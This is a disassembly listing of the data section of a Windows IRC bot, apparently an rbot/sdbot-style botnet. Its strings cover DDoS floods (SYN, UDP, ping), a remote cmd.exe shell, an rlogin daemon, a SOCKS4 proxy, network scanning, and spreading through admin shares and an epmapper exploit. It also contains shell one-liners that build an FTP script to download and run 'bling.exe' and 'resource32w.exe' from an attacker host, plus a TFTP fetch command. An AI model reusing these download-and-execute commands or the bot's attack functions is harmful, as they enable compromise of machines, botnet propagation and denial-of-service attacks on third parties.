aMainFailedToRe db '[MAIN]: Failed to reboot system.',0 ; DATA XREF: sub_409806+1188�o
align 4
aMainRebootingS db '[MAIN]: Rebooting system.',0 ; DATA XREF: sub_409806+1181�o
align 4
aReboot db 'reboot',0 ; DATA XREF: sub_409806+116E�o
align 10h
aI_0: ; DATA XREF: sub_409806+115A�o
unicode 0, <i>,0
aId db 'id',0 ; DATA XREF: sub_409806+1146�o
align 4
aS_9: ; DATA XREF: sub_409806+1132�o
unicode 0, <s>,0
aStatus db 'status',0 ; DATA XREF: sub_409806+111E�o
align 4
aQ: ; DATA XREF: sub_409806+110A�o
unicode 0, <q>,0
aQuit_0 db 'quit',0 ; DATA XREF: sub_409806+10F6�o
align 10h
aDc db 'dc',0 ; DATA XREF: sub_409806+10E2�o
align 4
aDisconnect db 'disconnect',0 ; DATA XREF: sub_409806+10CE�o
align 10h
aR: ; DATA XREF: sub_409806+10BA�o
; sub_409806+190D�o ...
unicode 0, <r>,0
aReconnect db 'reconnect',0 ; DATA XREF: sub_409806+10A6�o
align 10h
aStats db 'stats',0 ; DATA XREF: sub_409806:loc_40A898�o
align 4
aScanstats db 'scanstats',0 ; DATA XREF: sub_409806+107E�o
align 4
aScan_0 db '[SCAN]',0 ; DATA XREF: sub_409806+1070�o
; sub_409806+5F0D�o
align 4
aScan_1 db 'Scan',0 ; DATA XREF: sub_409806+106B�o
align 4
aScanstop db 'scanstop',0 ; DATA XREF: sub_409806+1056�o
align 10h
aSecure_1 db '[SECURE]',0 ; DATA XREF: sub_409806+1048�o
align 4
aSecure_0 db 'Secure',0 ; DATA XREF: sub_409806+1043�o
align 4
aSecurestop db 'securestop',0 ; DATA XREF: sub_409806+102E�o
align 10h
aClones db '[CLONES]',0 ; DATA XREF: sub_409806+1020�o
align 4
aClone db 'Clone',0 ; DATA XREF: sub_409806+101B�o
align 4
aClonestop db 'clonestop',0 ; DATA XREF: sub_409806+1006�o
align 10h
aPsstop db 'psstop',0 ; DATA XREF: sub_409806+FF2�o
align 4
aProcsstop db 'procsstop',0 ; DATA XREF: sub_409806+FDE�o
align 4
aFfstop db 'ffstop',0 ; DATA XREF: sub_409806+FCA�o
align 4
aFindfilestop db 'findfilestop',0 ; DATA XREF: sub_409806+FB6�o
align 4
aTftp_0 db '[TFTP]',0 ; DATA XREF: sub_409806+FA8�o
align 4
aTftpstop db 'tftpstop',0 ; DATA XREF: sub_409806+F8E�o
align 10h
aPing_1 db '[PING]',0 ; DATA XREF: sub_409806+F80�o
align 4
aPingFlood db 'Ping flood',0 ; DATA XREF: sub_409806+F7B�o
align 4
aPingstop db 'pingstop',0 ; DATA XREF: sub_409806+F66�o
align 10h
aUpd db '[UPD]',0 ; DATA XREF: sub_409806+F58�o
align 4
aUdpFlood db 'UDP flood',0 ; DATA XREF: sub_409806+F53�o
align 4
aUdpstop db 'udpstop',0 ; DATA XREF: sub_409806+F3E�o
aSyn_0 db '[SYN]',0 ; DATA XREF: sub_409806+F30�o
align 4
aSynFlood db 'Syn flood',0 ; DATA XREF: sub_409806+F2B�o
align 10h
aSynstop db 'synstop',0 ; DATA XREF: sub_409806+F16�o
aDdos db '[DDoS]',0 ; DATA XREF: sub_409806+F08�o
align 10h
aDdosFlood db 'DDoS flood',0 ; DATA XREF: sub_409806+F03�o
align 4
aDdos_stop db 'ddos.stop',0 ; DATA XREF: sub_409806+EEE�o
align 4
aRedirect_0 db '[REDIRECT]',0 ; DATA XREF: sub_409806+EE0�o
align 4
aTcpRedirect db 'TCP redirect',0 ; DATA XREF: sub_409806+EDB�o
align 4
aRedirectstop db 'redirectstop',0 ; DATA XREF: sub_409806+EC6�o
align 4
aLog db '[LOG]',0 ; DATA XREF: sub_409806+EB8�o
align 4
aLogList db 'Log list',0 ; DATA XREF: sub_409806+EB3�o
align 4
aLogstop db 'logstop',0 ; DATA XREF: sub_409806+E9E�o
aHttpd db '[HTTPD]',0 ; DATA XREF: sub_409806+E90�o
aHttpstop db 'httpstop',0 ; DATA XREF: sub_409806+E76�o
align 4
aRlogind db '[RLOGIND]',0 ; DATA XREF: sub_409806+E68�o
align 10h
aRloginstop db 'rloginstop',0 ; DATA XREF: sub_409806+E4E�o
align 4
aSocks4_0 db '[SOCKS4]',0 ; DATA XREF: sub_409806+E40�o
align 4
aServer_0 db 'Server',0 ; DATA XREF: sub_409806+E3B�o
; sub_409806+E63�o ...
align 10h
aSocks4stop db 'socks4stop',0 ; DATA XREF: sub_409806+E26�o
align 4
aS4 db 's4',0 ; DATA XREF: sub_409806+E12�o
align 10h
aSocks4 db 'socks4',0 ; DATA XREF: sub_409806+DFE�o
align 4
aUnsec db 'unsec',0 ; DATA XREF: sub_409806+DEA�o
align 10h
aUnsecure db 'unsecure',0 ; DATA XREF: sub_409806+DD6�o
align 4
aSec db 'sec',0 ; DATA XREF: sub_409806+DC2�o
; sub_409806+541C�o
aSecure db 'secure',0 ; DATA XREF: sub_409806+DAE�o
; sub_409806+540C�o
align 4
aVer db 'ver',0 ; DATA XREF: sub_409806+D9A�o
aVersion db 'version',0 ; DATA XREF: sub_409806+D86�o
aLo db 'lo',0 ; DATA XREF: sub_409806+D72�o
align 4
aLogout db 'logout',0 ; DATA XREF: sub_409806+D5E�o
align 10h
aD: ; DATA XREF: sub_409806+D4A�o
; sub_415E96+7A�o
unicode 0, <d>,0
aDie db 'die',0 ; DATA XREF: sub_409806+D36�o
aRn db 'rn',0 ; DATA XREF: sub_409806+D22�o
align 4
aRndnick db 'rndnick',0 ; DATA XREF: sub_409806+D0B�o
a63 db '63',0 ; DATA XREF: sub_409806+BEA�o
align 4
asc_42A858: ; DATA XREF: sub_409806+BC2�o
unicode 0, <)>,0
aChr db '$chr(',0 ; DATA XREF: sub_409806+B87�o
align 4
aServer_1 db '$server',0 ; DATA XREF: sub_409806+B7C�o
aRndnick_0 db '$rndnick',0 ; DATA XREF: sub_409806+B6B�o
align 4
aChan db '$chan',0 ; DATA XREF: sub_409806+B4D�o
align 10h
aUser_2 db '$user',0 ; DATA XREF: sub_409806+B3C�o
align 4
aMe db '$me',0 ; DATA XREF: sub_409806+B2A�o
aD_0 db '$%d',0 ; DATA XREF: sub_409806+ABE�o
aD_1 db '$%d-',0 ; DATA XREF: sub_409806+A0B�o
align 4
dword_42A898 dd 49544F4Eh, 25204543h, 13A2073h, 474E4950h, 1732520h
; DATA XREF: sub_409806+971�o
dd 0A0Dh
dword_42A8B0 dd 4E495001h, 47hdword_42A8B8 dd 49544F4Eh, 25204543h, 13A2073h, 53524556h, 204E4F49h
; DATA XREF: sub_409806+934�o
dd 0D017325h, 0Ah
dword_42A8D4 dd 52455601h, 4E4F4953h, 1dword_42A8E0 dd 23h dword_42A8E4 dd 6Ch dword_42A8E8 dd 323333h ; sub_409806+7EC�o ...
aMainJoinedChan db '[MAIN]: Joined channel: %s.',0 ; DATA XREF: sub_409806+6F0�o
aMainUserSLog_0 db '[MAIN]: User: %s logged out.',0 ; DATA XREF: sub_409806+690�o
align 4
a353 db '353',0 ; DATA XREF: sub_409806+63E�o
aPart db 'PART',0 ; DATA XREF: sub_409806+5C2�o
align 4
aSS_3 db ':%s%s',0 ; DATA XREF: sub_409806+593�o
align 4
aNick db 'NICK',0 ; DATA XREF: sub_409806+3E4�o
align 4
aNoticeSS db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_409806+370�o
; sub_409806+6CE�o
aMainUserSLogge db '[MAIN]: User %s logged out.',0 ; DATA XREF: sub_409806+357�o
; sub_409806+555A�o ...
aKick db 'KICK',0 ; DATA XREF: sub_409806+2D7�o
align 4
aNickS_0 db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_409806+26E�o
; sub_409806+437B�o ...
align 4
a433 db '433',0 ; DATA XREF: sub_409806+24B�o
a@: ; DATA XREF: sub_409806+222�o
unicode 0, <@>,0
a302 db '302',0 ; DATA XREF: sub_409806+215�o
a005 db '005',0 ; DATA XREF: sub_409806+202�o
a001 db '001',0 ; DATA XREF: sub_409806+1EF�o
aJoinSS_0 db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_409806+1D2�o
; sub_409806+383B�o ...
align 4
aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: sub_409806+1B0�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_409806+19A�o
align 4
asc_42A9BC: ; DATA XREF: sub_409806+188�o
; sub_409806+60E1�o
unicode 0, <!>,0
aSecureSystemSe db '[SECURE]: System secure monitor active.',0 ; DATA XREF: sub_40FAD0+38F�o
aMainBotStarted db '[MAIN]: Bot started.',0 ; DATA XREF: sub_40FAD0+356�o
align 10h
aSDS db '%s %d "%s"',0 ; DATA XREF: sub_40FAD0+286�o
align 4
aRedirectFail_0 db '[REDIRECT]: Failed to start connection thread, error: <%d>.',0
; DATA XREF: sub_4100C6+153�o
aRedirectClient db '[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_4100C6+DB�o
align 4
aRedirectFail_1 db '[REDIRECT]: Failed to start client thread, error: <%d>.',0
; DATA XREF: sub_4102A3+13F�o
aRedirectClie_0 db '[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_4102A3+DD�o
align 4
aPrivmsgSS db 'PRIVMSG %s :%s',0Dh,0 ; DATA XREF: sub_410492+35�o
aCmdCouldNotR_0 db '[CMD]: Could not read data from proccess.',0Dh,0Ah,0
; DATA XREF: sub_410520:loc_410684�o
aCmdProccessHas db '[CMD]: Proccess has terminated.',0Dh,0Ah,0 ; DATA XREF: sub_410520+141�o
align 4
aCmdCouldNotRea db '[CMD]: Could not read data from proccess',0Dh,0Ah,0
; DATA XREF: sub_410520:loc_41062F�o
align 10h
aCmdFailedToSta db '[CMD]: Failed to start IO thread, error: <%d>.',0
; DATA XREF: sub_4106AD+18E�o
align 10h
aCmdRemoteComma db '[CMD]: Remote Command Prompt',0 ; DATA XREF: sub_4106AD+146�o
align 10h
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_4106AD+1F�o
aRlogindProtoco db '[RLOGIND]: Protocol string too long.',0
; DATA XREF: sub_41085C:loc_41088E�o
align 10h
aRlogindLoginRe db '[RLOGIND]: Login rejected, Remote user: <%s@%s>.',0
; DATA XREF: sub_4108A7+39�o
align 4
aRlogindUserL_0 db '[RLOGIND]: User logged out: <%s@%s>.',0 ; DATA XREF: sub_4108F4+1EF�o
align 4
aRlogindErrorSe db '[RLOGIND]: Error: SessionRun(): <%d>.',0 ; DATA XREF: sub_4108F4+1CF�o
align 4
aRlogindUserLog db '[RLOGIND]: User logged in: <%s@%s>.',0 ; DATA XREF: sub_4108F4+1AF�o
aPermissionDeni db 'Permission denied',0Ah,0 ; DATA XREF: sub_4108F4+184�o
align 4
aRlogindErrorGe db '[RLOGIND]: Error: getpeername(): <%d>.',0 ; DATA XREF: sub_4108F4+F4�o
align 4
aRlogindError_0 db '[RLOGIND]: Error: server failed, returned: <%d>.',0
; DATA XREF: sub_410B00+215�o
align 4
aRlogindFaile_1 db '[RLOGIND]: Failed to start client thread, error: <%d>.',0
; DATA XREF: sub_410B00+1C9�o
align 10h
aRlogindClientC db '[RLOGIND]: Client connection from IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_410B00+158�o
aRlogindReadyAn db '[RLOGIND]: Ready and waiting for incoming connections.',0
; DATA XREF: sub_410B00+FF�o
align 4
aRlogindFaile_0 db '[RLOGIND]: Failed to install control-C handler, error: <%d>.',0
; DATA XREF: sub_410B00+70�o
align 4
aRlogindErrorWs db '[RLOGIND]: Error: WSAStartup(): <%d>.',0 ; DATA XREF: sub_410B00+3E�o
align 10h
aSI db '%s%i',0 ; DATA XREF: sub_410D7C+40�o
; .text:00410E77�o ...
align 4
aPc db 'PC',0 ; DATA XREF: .text:00410E45�o
align 4
aS_1 db '%s|',0 ; DATA XREF: .text:00410EC5�o
aS_7 db '[%s]|',0 ; DATA XREF: .text:00410FAD�o
align 4
a??? db '???',0 ; DATA XREF: .text:loc_410FA4�o
; sub_412AEE:loc_412B8F�o
a2k3 db '2K3',0 ; DATA XREF: .text:00410F9D�o
aXp_0 db 'XP',0 ; DATA XREF: .text:00410F92�o
; sub_412AEE+8B�o
align 4
a2k db '2K',0 ; DATA XREF: .text:00410F85�o
; sub_412AEE+7C�o
align 4
aMe_0 db 'ME',0 ; DATA XREF: .text:00410F72�o
; sub_412AEE+68�o
align 4
a98 db '98',0 ; DATA XREF: .text:00410F65�o
; sub_412AEE+59�o
align 10h
aNt db 'NT',0 ; DATA XREF: .text:00410F58�o
; sub_412AEE+4A�o
align 4
a95 db '95',0 ; DATA XREF: .text:00410F4D�o
; sub_412AEE+39�o
align 4
aDS db '[%d]%s',0 ; DATA XREF: sub_410FF6+3A�o
align 10h
aM_0 db '[M]',0 ; DATA XREF: sub_410FF6+2C�o
; sub_410FF6+51�o
aScanIpSPortD_0 db '[SCAN]: IP: %s Port: %d is open.',0 ; DATA XREF: sub_411125+85�o
align 4
aScanScanningIp db '[SCAN]: Scanning IP: %s, Port: %d.',0 ; DATA XREF: sub_4111E7+40�o
align 4
aD_2 db 'D:\',0 ; DATA XREF: .text:0043022C�o
aD_3 db 'D$',0 ; DATA XREF: .text:00430228�o
align 4
aC_2 db 'C:\',0 ; DATA XREF: .text:00430224�o
aC_3 db 'C$',0 ; DATA XREF: .text:00430220�o
align 4
aAdmin_0 db 'ADMIN$',0 ; DATA XREF: .text:00430218�o
align 4
aIpc_0 db 'IPC$',0 ; DATA XREF: .text:off_430210�o
align 4
aSecureNetapi32 db '[SECURE]: Netapi32.dll couldn',27h,'t be loaded.',0
; DATA XREF: sub_4112AD+2E8�o
; sub_4115D4+2DA�o
align 4
aSecureNetworkS db '[SECURE]: Network shares deleted.',0 ; DATA XREF: sub_4112AD+2D2�o
align 4
aSecureFailed_4 db '[SECURE]: Failed to delete ',27h,'%S',27h,' share.',0
; DATA XREF: sub_4112AD:loc_411518�o
align 4
aSecureShareS_0 db '[SECURE]: Share ',27h,'%S',27h,' deleted.',0
; DATA XREF: sub_4112AD+264�o
align 4
aSecureFailed_3 db '[SECURE]: Failed to delete ',27h,'%s',27h,' share.',0
; DATA XREF: sub_4112AD:loc_411488�o
align 4
aSecureShareSDe db '[SECURE]: Share ',27h,'%s',27h,' deleted.',0
; DATA XREF: sub_4112AD+1D4�o
align 4
aSecureAdvapi32 db '[SECURE]: Advapi32.dll couldn',27h,'t be loaded.',0
; DATA XREF: sub_4112AD:loc_4113E0�o
; sub_4115D4:loc_411703�o
align 4
aSecureFailed_2 db '[SECURE]: Failed to open IPC$ Restriction registry key.',0
; DATA XREF: sub_4112AD:loc_4113D9�o
aSecureRestrict db '[SECURE]: Restricted access to the IPC$ Share.',0
; DATA XREF: sub_4112AD:loc_4113C1�o
align 10h
aSecureFailed_1 db '[SECURE]: Failed to restrict access to the IPC$ Share.',0
; DATA XREF: sub_4112AD+10D�o
align 4
aRestrictanonym db 'restrictanonymous',0 ; DATA XREF: sub_4112AD+EE�o
; sub_4115D4+EE�o
align 4
aSecureFailed_0 db '[SECURE]: Failed to open DCOM registry key.',0
; DATA XREF: sub_4112AD+92�o
; sub_4115D4+92�o
aSecureDcomDisa db '[SECURE]: DCOM disabled.',0 ; DATA XREF: sub_4112AD:loc_411321�o
align 4
aSecureDisableD db '[SECURE]: Disable DCOM failed.',0 ; DATA XREF: sub_4112AD+6D�o
align 4
aEnabledcom db 'EnableDCOM',0 ; DATA XREF: sub_4112AD+55�o
; sub_4115D4+55�o
align 10h
aSecureNetwor_0 db '[SECURE]: Network shares added.',0 ; DATA XREF: sub_4115D4+2C2�o
aC_0 db '%c:\',0 ; DATA XREF: sub_4115D4+22C�o
align 4
aC_1 db '%c$',0 ; DATA XREF: sub_4115D4+21B�o
aSecureFailed_7 db '[SECURE]: Failed to add ',27h,'%s',27h,' share.',0
; DATA XREF: sub_4115D4:loc_411782�o
; sub_4115D4:loc_411849�o
aSecureShareSAd db '[SECURE]: Share ',27h,'%s',27h,' added.',0 ; DATA XREF: sub_4115D4+1A7�o
; sub_4115D4+26E�o
aSecureFailed_6 db '[SECURE]: Failed to open IPC$ restriction registry key.',0
; DATA XREF: sub_4115D4:loc_4116FC�o
aSecureUnrestri db '[SECURE]: Unrestricted access to the IPC$ Share.',0
; DATA XREF: sub_4115D4:loc_4116E4�o
align 4
aSecureFailed_5 db '[SECURE]: Failed to unrestrict access to the IPC$ Share.',0
; DATA XREF: sub_4115D4+109�o
align 4
aSecureDcomEnab db '[SECURE]: DCOM enabled.',0 ; DATA XREF: sub_4115D4:loc_411648�o
aSecureEnableDc db '[SECURE]: Enable DCOM failed.',0 ; DATA XREF: sub_4115D4+6D�o
align 4
aRlogindFaile_2 db '[RLOGIND]: Failed to execute shell, error: <%d>.',0
; DATA XREF: sub_411963+B7�o
align 10h
aCmdQ db 'cmd /q',0 ; DATA XREF: sub_411963+80�o
align 4
aRlogindSession db '[RLOGIND]: SessionReadShellThread exited, error: <%ld>.',0
; DATA XREF: sub_411A2F+89�o
aRlogindFaile_5 db '[RLOGIND]: Failed to execute shell.',0 ; DATA XREF: sub_411BE1+B2�o
aRlogindFaile_4 db '[RLOGIND]: Failed to create shell stdin pipe, error: <%d>.',0
; DATA XREF: sub_411BE1+82�o
align 10h
aRlogindFaile_3 db '[RLOGIND]: Failed to create shell stdout pipe, error: <%d>.',0
; DATA XREF: sub_411BE1+5F�o
aRlogindWaitfor db '[RLOGIND]: WaitForMultipleObjects error: <%d>.',0
; DATA XREF: sub_411CDD+E2�o
align 10h
aRlogindFaile_6 db '[RLOGIND]: Failed to create ReadShell session thread, error: <%d>'
; DATA XREF: sub_411CDD+59�o
; sub_411CDD+8F�o
db '.',0
align 4
aSocks4ErrorF_0 db '[SOCKS4]: Error: Failed to connect to target, returned: <%d>.',0
; DATA XREF: sub_4121E2+1A7�o
align 4
aSocks4ErrorFai db '[SOCKS4]: Error: Failed to open socket(), returned: <%d>.',0
; DATA XREF: sub_4121E2+187�o
align 10h
aSocks4Authenti db '[SOCKS4]: Authentication failed. Remote userid: %s != %s.',0
; DATA XREF: sub_4121E2+F6�o
align 4
aSocks4Failed_1 db '[SOCKS4]: Failed to start server on Port %d.',0
; DATA XREF: sub_412412+1A1�o
align 4
aSocks4Failed_0 db '[SOCKS4]: Failed to start client thread, error: <%d>.',0
; DATA XREF: sub_412412+16C�o
align 4
aSocks4ClientCo db '[SOCKS4]: Client connection from IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_412412+107�o
align 4
aSynSendErrorD_ db '[SYN]: Send error: <%d>.',0 ; DATA XREF: sub_4125FE+242�o
align 10h
aSynDoneWithFlo db '[SYN]: Done with flood (%iKB/sec).',0 ; DATA XREF: sub_4128D2+48�o
align 4
aDdDhDm db '%dd %dh %dm',0 ; DATA XREF: sub_41296D+39�o
aSysinfoCpuI64u db '[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB total, %sKB free. [Disk]:'
; DATA XREF: sub_412AEE+247�o
db ' %s total, %s free. [OS]: Windows %s (%d.%d, Build %d). [Sysdir]:'
db ' %s. [Hostname]: %s (%s). [Current User]: %s. [Date]: %s. [Time]:'
db ' %s. [Uptime]: %s.',0
align 4
aDdMmmYyyy db 'dd:MMM:yyyy',0 ; DATA XREF: sub_412AEE+161�o
aCouldnTResolve db 'couldn',27h,'t resolve host',0 ; DATA XREF: sub_412AEE:loc_412C21�o
align 4
aSS_5 db '%s (%s)',0 ; DATA XREF: sub_412AEE+C0�o
aNetinfoTypeSS_ db '[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.',0
; DATA XREF: sub_412D55+99�o
align 4
off_42B6E4 dd offset loc_412F4E ; DATA XREF: sub_412D55+67�o
dword_42B6E8 dd 4E414Ch dword_42B6EC dd 6C616944h, 70752Dhdword_42B6F4 dd 20746F4Eh, 6E6E6F63h, 65746365h, 64h, 0aTcpErrorSendin db '[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returne'
; DATA XREF: sub_412E0B+3C5�o
db 'd: <%d>.',0
align 8
aTcpDoneWithSFl db '[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/se'
; DATA XREF: sub_412E0B+35B�o
db 'c (%dMB).',0
align 4
aTcpInvalidTarg db '[TCP]: Invalid target IP.',0 ; DATA XREF: sub_412E0B+CB�o
align 10h
aTcpErrorSetsoc db '[TCP]: Error: setsockopt() failed, returned: <%d>.',0
; DATA XREF: sub_412E0B+AC�o
align 4
aTcpErrorSocket db '[TCP]: Error: socket() failed, returned: <%d>.',0
; DATA XREF: sub_412E0B+67�o
align 4
dword_42B824 dd 4000500h, 7868746Bh, 0aTftpFileTran_0 db '[TFTP]: File transfer complete to IP: %s (%s).',0
; DATA XREF: sub_4131EE+44C�o
align 10h
aTftpFileNotFou db '[TFTP]: File not found: %s (%s).',0 ; DATA XREF: sub_4131EE+395�o
align 4
dword_42B884 dd 1000500h, 656C6946h, 746F4E20h, 756F4620h, 646Eh
; DATA XREF: sub_4131EE+379�o
aTftpFileTransf db '[TFTP]: File transfer started to IP: %s (%s).',0
; DATA XREF: sub_4131EE+324�o
align 4
aTftpFailedToOp db '[TFTP]: Failed to open file: %s.',0 ; DATA XREF: sub_4131EE+14D�o
align 4
aTftpErrorSocke db '[TFTP]: Error: socket() failed, returned: <%d>.',0
; DATA XREF: sub_4131EE+6C�o
aOctet db 'octet',0 ; DATA XREF: sub_4131EE+11�o
align 4
aThreadList db '-[Thread List]-',0 ; DATA XREF: sub_413721+10�o
aSNoSThreadFoun db '%s: No %s thread found.',0 ; DATA XREF: sub_4138EC+51�o
aSSStopped_DThr db '%s: %s stopped. (%d thread(s) stopped.)',0 ; DATA XREF: sub_4138EC+35�o
aVisitFailedToG db '[VISIT]: Failed to get requested URL from HTTP server.',0
; DATA XREF: sub_413A01:loc_413B9D�o
align 4
aVisitUrlVisite db '[VISIT]: URL visited.',0 ; DATA XREF: sub_413A01+195�o
align 4
aVisitFailedToC db '[VISIT]: Failed to connect to HTTP server.',0
; DATA XREF: sub_413A01+17F�o
align 10h
aVisitCouldNotO db '[VISIT]: Could not open a connection.',0 ; DATA XREF: sub_413A01+150�o
align 4
aVisitInvalidUr db '[VISIT]: Invalid URL.',0 ; DATA XREF: sub_413A01+AB�o
align 10h
asc_42BA30 db '*/*',0 ; DATA XREF: sub_413A01+68�o
aSExploitingIpS db '[%s]: Exploiting IP: %s.',0 ; DATA XREF: sub_413C0C+2B8�o
; .text:00414803�o ...
align 10h
aHostSContentTy db 'Host: %s',0Dh,0Ah ; DATA XREF: sub_413C0C+1BA�o
db 'Content-Type: text/xml',0Dh,0Ah
db 'Content-Length: %d',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHttp1_1 db ' HTTP/1.1',0Dh,0Ah,0 ; DATA XREF: sub_413C0C+183�o
aSearch db 'SEARCH /',0 ; DATA XREF: sub_413C0C+CC�o
align 4
dword_42BAA4 dd 0 asc_42BAA8: ; DATA XREF: sub_41411D+17�o
; sub_4141FB+17�o
unicode 0, <\\>,0
align 10h
aIpc: ; DATA XREF: sub_41411D+C�o
; sub_4141FB+C�o
unicode 0, <\IPC$>,0
aTftpFileTran_1 db '[TFTP]: File transfer complete to IP: %s',0 ; DATA XREF: .text:004147B6�o
; .text:004149E9�o
align 4
aSPipeEpmapper db '\\%s\pipe\epmapper',0 ; DATA XREF: .text:00414561�o
align 10h
aEchoOpenSDOEch db 'echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &'
; DATA XREF: .text:00414C83�o
db 'echo quit >> o &ftp -n -s:o &bling.exe',0Dh,0Ah,0
align 4
aTftpISGetS db 'tftp -i %s get %s',0Dh,0Ah,0 ; DATA XREF: .text:00414C59�o
aNilsisgay db 'NILSISGAY!!',0 ; DATA XREF: .text:00414B2A�o
; ---------------------------------------------------------------------------
loc_42BB8C: ; DATA XREF: .text:00414B17�o
jmp short loc_42BB9D
; ---------------------------------------------------------------------------
align 10h
dword_42BB90 dd 2016280h, 100BDh, 8F160001h db 82h
; ---------------------------------------------------------------------------
loc_42BB9D: ; CODE XREF: .text:loc_42BB8C�j
add [eax], eax
; ---------------------------------------------------------------------------
db 0
dd 0
dword_42BBA4 dd 255C3A63h, 78652E73h, 65haEchoOpenSDOE_0 db 'echo open %s %d > o&echo user 1 1 >> o &echo get resource32w.exe '
; DATA XREF: sub_4150F9+94�o
; .text:00415DBB�o
db '>> o &echo quit >> o &ftp -n -s:o &del o &resource32w.exe',0Dh,0Ah,0
align 10h
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_415242+27�o
; .text:0041587B�o
align 4
dword_42BC3C dd 1CEC8166h ; .text:00415827�r
dword_42BC40 dd 0E4FF07h ; .text:00415831�r
aSTryingSploitI db '[%s]: Trying Sploit IP: %s.',0 ; DATA XREF: .text:00415E32�o
aSExploitingI_0 db '[%s]: Exploiting IP: %s, Share: \%s, User: (%s/%s)',0
; DATA XREF: sub_415E96+206�o
align 4
aNoPassword db '(no password)',0 ; DATA XREF: sub_415E96+1E4�o
align 4
aSSS_3 db '%s\%s\%s',0 ; DATA XREF: sub_415E96+CB�o
align 10h
aCWindowsSystem db 'c$\windows\system32',0 ; DATA XREF: sub_415E96+6C�o
aCWinntSystem32 db 'c$\winnt\system32',0 ; DATA XREF: sub_415E96+65�o
align 4
aAdminSystem32 db 'Admin$\system32',0 ; DATA XREF: sub_415E96+5E�o
aSIpc_0 db '%s\ipc$',0 ; DATA XREF: .text:004161C9�o
aS_6 db '\\%s',0 ; DATA XREF: .text:0041618B�o
align 4
a100m db '100',0Dh,0Ah,0 ; DATA XREF: .text:00416716�o
align 10h
a001merrorExecu db '001Error Executing File',0Dh,0Ah,0 ; DATA XREF: .text:004166FE�o
align 4
a008mcA_exe db '008C:\a.exe',0Dh,0Ah,0 ; DATA XREF: .text:004166CD�o
align 4
aOkRcvd db '+OK RCVD',0 ; DATA XREF: .text:004166AC�o
align 4
aOkRedy db '+OK REDY',0 ; DATA XREF: .text:00416645�o
align 4
aCA_exeD db 'C:\a.exe',0Dh,0Ah ; DATA XREF: .text:004165F5�o
db '%d',0Dh,0Ah,0
align 4
a020m db '020',0Dh,0Ah,0 ; DATA XREF: .text:00416510�o
align 4
a019m db '019',0Dh,0Ah,0 ; DATA XREF: .text:004164E3�o
align 4
a022mmv1_2 db '022v1.2',0Dh,0Ah,0 ; DATA XREF: .text:loc_41647E�o
a022mmv1_1 db '022v1.1',0Dh,0Ah,0 ; DATA XREF: .text:00416477�o
a001m db '001',0 ; DATA XREF: .text:0041645A�o
; .text:004164CA�o
align 4
a001myourClient db '001Your client version is outdated!',0 ; DATA XREF: .text:0041641C�o
align 4
a022moptestmv_0 db '022OPtestv1.2',0Dh,0Ah,0 ; DATA XREF: .text:loc_4163CA�o
align 10h
a022moptestmv1_ db '022OPtestv1.1',0Dh,0Ah,0 ; DATA XREF: .text:004163C3�o
align 8
stru_42BDD8 _msEH <0FFFFFFFFh, 0, offset sub_416CEA> ; DATA XREF: sub_416C97+2�o
align 8
stru_42BDE8 _msEH <0FFFFFFFFh, 0, offset sub_416D77> ; DATA XREF: sub_416D08+2�o
align 8
stru_42BDF8 _msEH <0FFFFFFFFh, 0, offset sub_416E53> ; DATA XREF: sub_416E0D+2�o
align 8
stru_42BE08 _msEH <0FFFFFFFFh, 0, offset sub_416F89> ; DATA XREF: sub_416F47+2�o
align 8
stru_42BE18 _msEH <0FFFFFFFFh, 0, offset sub_4170F3> ; DATA XREF: sub_416F93+2�o
align 8
stru_42BE28 _msEH <0FFFFFFFFh, 0, offset sub_417192> ; DATA XREF: sub_417140+2�o
align 8
stru_42BE38 _msEH <0FFFFFFFFh, offset loc_4174F4, offset loc_4174F8>
; DATA XREF: sub_417456+2�o
align 8
stru_42BE48 _msEH <0FFFFFFFFh, 0, offset sub_417888> ; DATA XREF: sub_417834+2�o
align 8
stru_42BE58 _msEH <0FFFFFFFFh, 0, offset sub_4181F2> ; DATA XREF: sub_418177+2�o
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: sub_418239+F�o
align 4
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: sub_418239�o
stru_42BE80 _msEH <0FFFFFFFFh, 0, offset sub_4185B6> ; DATA XREF: sub_418577+2�o
; sub_4189AC+53�r
align 10h
stru_42BE90 _msEH <0FFFFFFFFh, offset loc_4187CB, offset loc_4187DF>
; DATA XREF: .text:00418635�o
align 10h
byte_42BEA0 db 6 ; DATA XREF: sub_4189AC:loc_418A0D�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
dd 60686008h, 606060h, 78707000h, 8787878h, 807h, 8080007h
dd 8000008h, 7000800h, 8
aNull: ; DATA XREF: .text:off_43236C�o
unicode 0, <(null)>,0
align 4
aNull_1 db '(null)',0 ; DATA XREF: .text:off_432368�o
align 8
stru_42BF18 _msEH <0FFFFFFFFh, offset loc_41972A, offset loc_41972E>
; DATA XREF: sub_419255+5�o
align 8
aHH:
unicode 0, < h(((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(1810181h), 0Ah dup(1010101h), 3 dup(100010h)
dd 3 dup(1820182h), 0Ah dup(1020102h), 2 dup(100010h)
dd 20h, 4030201h, 8070605h, 0C0B0A09h, 100F0E0Dh, 14131211h
dd 18171615h, 1C1B1A19h, 201F1E1Dh, 24232221h, 28272625h
dd 2C2B2A29h, 302F2E2Dh, 34333231h, 38373635h, 3C3B3A39h
